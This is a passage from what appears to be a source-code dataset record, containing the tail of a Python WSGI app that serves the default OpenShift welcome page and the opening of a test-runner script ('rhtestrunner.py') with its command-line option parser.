src=\"data:image/png;base64,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\nFC4iARmjflSvrIi4f
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
oHlS9MrY/NJbc3\n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\nMRB4FvgucA6wNGk7H8nycQhed9Cle
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\n/w+9BQu2G5s85QAAAABJRU5ErkJggg==\">\n <h1>\n Welcome to OpenShift\n 
</h1>\n <p>\n Place your application here\n </p>\n <p>\n In order to commit to your new project, go to your project's git repo (created with the rhc-create-app command). Make your changes, then run:\n </p>\n <pre>\n git commit -a -m 'Some commit message'\n git push\n </pre>\n <p>\n Then reload this page.\n </p>\n \n <h2>\n What's next?\n </h2>\n <ul>\n <li>\n Why not visit us at <a href=\"http://openshift.redhat.com\">http://openshift.redhat.com</a>, or\n </li>\n <li>\n You could get help in the <a href=\"http://www.redhat.com/openshift\">OpenShift forums</a>, or\n </li>\n <li>\n You're welcome to come chat with us in our IRC channel at #openshift on freenode.net\n </li>\n </ul>\n</body>\n</html>'''\n\n\tstatus = '200 OK'\n\tresponse_headers = [('Content-Type', ctype), ('Content-Length', str(len(response_body)))]\n\t#\n\tstart_response(status, response_headers)\n\treturn [response_body]\n\n#\n# Below for testing only\n#\nif __name__ == '__main__':\n\tfrom wsgiref.simple_server import make_server\n\thttpd = make_server('localhost', 8051, application)\n\t# Wait for a single request, serve it and quit.\n\thttpd.handle_request()\n" }, { "alpha_fraction": 0.5236069560050964, "alphanum_fraction": 0.5274817943572998, "avg_line_length": 41.9330940246582, "blob_id": "76babc38c0c36388d21207c5ca48d480ed517046", "content_id": "803e09687c8ea6d1aed5357f2409346b1f440d89", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 23743, "license_type": "no_license", "max_line_length": 455, "num_lines": 553, "path": "/automation/open/lib/rhtestrunner.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport sys, os\nimport time\nimport storage\nfrom optparse import OptionParser\nimport database\nimport commands\nimport random\nimport platform\nimport socket \n\n#### homegrown python modules\nimport timelib\nimport tcms_base\n#from tcms_base import *\nimport pscp\nimport aws_console\nimport shutil\nimport tcms\nimport openshift\nimport rhtest\nfrom helper import cmd_get_status_output\n\ndef config_parser():\n \"\"\" parses options and such \"\"\"\n parser = OptionParser()\n parser.set_defaults(VERBOSE=True)\n parser.set_defaults(DEBUG=False)\n parser.set_defaults(RECORD=True)\n parser.set_defaults(GLOBAL_RECORD=True)\n parser.set_defaults(TCMS=False)\n parser.add_option(\"-a\", \"--ami_id\", help=\"ami_id or devenv label as base of instance to be created\")\n parser.add_option(\"-b\", \"--instance_name\", default=None, help=\"new instance's name\")\n parser.add_option(\"-i\", \"--instance_ip\", help=\"dev instance IP\")\n parser.add_option(\"-j\", \"--json_file\", help=\"path to the json formatted file that contains the script name\")\n parser.add_option(\"-l\", \"--tag\", help=\"TCMS testcase tags to run\")\n parser.add_option(\"-m\", \"--run_mode\", default='DEV', help=\"PROD|STG|DEV\")\n parser.add_option(\"-n\", \"--notes\", default=None, help=\"User notes about this run\")\n parser.add_option(\"-x\", \"--tcms_run_details\", default=None, help=\"TCMS test run details taken from launcher.py\")\n # useful options for development\n parser.add_option(\"-d\", action=\"store_true\", dest=\"DEBUG\", help=\"enable DEBUG (default false)\")\n parser.add_option('-R', action=\"store_false\", dest=\"RECORD\", help=\"Disable storing to results database (enabled by default)\")\n parser.add_option('-G', action=\"store_false\", dest=\"GLOBAL_RECORD\", help=\"Disable storing to global storage (enabled by default)\")\n parser.add_option(\"-T\", 
